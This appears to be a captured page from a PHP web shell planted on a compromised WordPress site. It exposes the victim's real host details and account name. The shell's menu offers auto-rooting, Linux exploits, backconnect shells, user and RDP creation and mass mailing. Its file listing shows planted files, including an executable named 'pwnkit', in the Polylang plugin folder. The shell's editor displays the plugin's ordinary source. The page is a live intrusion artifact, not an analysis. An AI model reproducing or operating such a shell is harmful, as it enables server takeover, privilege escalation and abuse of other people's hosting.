Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
polylang /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
flags
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
140.46
KB
-rw-r--r--
polylang.php
3.06
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
10.52
KB
-rw-r--r--
uninstall.php
4.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : polylang.php
<?php /** * Polylang * * @package Polylang * @author WP SYNTEX * @license GPL-3.0-or-later * * @wordpress-plugin * Plugin Name: Polylang * Plugin URI: https://polylang.pro * Description: Adds multilingual capability to WordPress * Version: 3.8.4 * Requires at least: 6.5 * Requires PHP: 7.4 * Author: WP SYNTEX * Author URI: https://polylang.pro * Text Domain: polylang * License: GPL v3 or later * License URI: https://www.gnu.org/licenses/gpl-3.0.txt * * Copyright 2011-2019 Frédéric Demarle * Copyright 2019-2026 WP SYNTEX * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ defined( 'ABSPATH' ) || exit; if ( defined( 'POLYLANG_VERSION' ) ) { // The user is attempting to activate a second plugin instance, typically Polylang and Polylang Pro. require_once ABSPATH . 'wp-admin/includes/plugin.php'; require_once ABSPATH . 'wp-includes/pluggable.php'; if ( is_plugin_active( plugin_basename( __FILE__ ) ) ) { deactivate_plugins( plugin_basename( __FILE__ ) ); // Deactivate this plugin. // WP does not allow us to send a custom meaningful message, so just tell the plugin has been deactivated. wp_safe_redirect( add_query_arg( 'deactivate', 'true', remove_query_arg( 'activate' ) ) ); exit; } return; } // Go on loading the plugin. define( 'POLYLANG_VERSION', '3.8.4' ); define( 'PLL_MIN_WP_VERSION', '6.5' ); define( 'PLL_MIN_PHP_VERSION', '7.4' ); define( 'POLYLANG_FILE', __FILE__ ); define( 'POLYLANG_DIR', __DIR__ ); // Whether we are using Polylang or Polylang Pro, get the filename of the plugin in use. if ( ! defined( 'POLYLANG_ROOT_FILE' ) ) { define( 'POLYLANG_ROOT_FILE', __FILE__ ); } if ( ! defined( 'POLYLANG_BASENAME' ) ) { define( 'POLYLANG_BASENAME', plugin_basename( __FILE__ ) ); // Plugin name as known by WP. require __DIR__ . '/vendor/autoload.php'; } define( 'POLYLANG', ucwords( str_replace( '-', ' ', dirname( POLYLANG_BASENAME ) ) ) ); if ( ! empty( $_GET['deactivate-polylang'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification return; } require POLYLANG_DIR . '/src/constant-functions.php'; if ( ! PLL_Usable::can_activate() ) { // WP version or php version is too old. return; } define( 'POLYLANG_ACTIVE', true ); if ( PLL_Deactivate::is_deactivation() ) { // Stopping here if we are going to deactivate the plugin (avoids breaking rewrite rules). PLL_Deactivate::add_hooks(); return; } PLL_Activate::add_hooks(); new Polylang();
Close